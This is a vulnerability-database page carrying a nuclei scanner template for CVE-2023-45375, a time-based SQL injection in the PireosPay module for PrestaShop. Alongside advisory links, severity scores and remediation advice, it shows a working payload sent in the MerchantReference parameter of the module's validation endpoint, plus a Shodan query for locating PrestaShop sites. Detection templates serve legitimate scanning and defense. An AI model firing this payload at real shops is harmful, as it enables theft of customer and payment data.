PrestaShop PireosPay - SQL Injection

28 Jun 2026 15:08:32 | Reported by ProjectDiscovery | Type: nuclei | github.com

PrestaShop PireosPay SQL Injection - Guest can perform SQL injection in PireosPay module for PrestaShop, version 1.7.9 from 01generator.co

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2023-45375 | 17 Oct 2023 05:15 | attackerkb |
| CNNVD | PrestaShop SQL Injection Vulnerability | 17 Oct 2023 00:00 | cnnvd |
| CVE | CVE-2023-45375 | 17 Oct 2023 00:00 | cve |
| Cvelist | CVE-2023-45375 | 17 Oct 2023 00:00 | cvelist |
| NVD | CVE-2023-45375 | 17 Oct 2023 05:15 | nvd |
| OSV | CVE-2023-45375 | 17 Oct 2023 05:15 | osv |
| Prion | Sql injection | 17 Oct 2023 05:15 | prion |
| Positive Technologies | PT-2023-29532 · Pireospay +1 · Pireospay +1 | 16 Oct 2023 00:00 | ptsecurity |
| RedhatCVE | CVE-2023-45375 | 23 May 2025 03:40 | redhatcve |
| Vulnrichment | CVE-2023-45375 | 17 Oct 2023 00:00 | vulnrichment |

id: CVE-2023-45375
info:
  name: PrestaShop PireosPay - SQL Injection
  author: MaStErChO
  severity: high
  description: |
    In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Authenticated attackers can execute time-based SQL injection through the MerchantReference parameter in the validation endpoint to extract PrestaShop database information including customer and payment data.
  remediation: |
    Update PireosPay module to a version newer than 1.7.9 that properly sanitizes SQL parameters in the validation endpoint.
  reference:
    - https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-45375
    cwe-id: CWE-89
    epss-score: 0.38457
    epss-percentile: 0.98386
    cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 01generator
    product: pireospay
    framework: prestashop
    shodan-query: "http.component:\"prestashop\""
  tags: time-based-sqli,cve,cve2023,sqli,prestashop,pireospay,01generator,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "/modules/pireospay/")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20
        POST /module/pireospay/validation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 302
          - contains(content_type, "text/html")
        condition: and
# digest: 4a0a00473045022027d421550c6c1334107b15ad1f6b7e2f50ce48e7fbbe137a83f750e8556e8517022100ccf9e38603b82602f5d6e4c33f9f2f1ca0a8abf39812bf6714ebdd00e8fae5f8:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 8.8
EPSS: 0.38457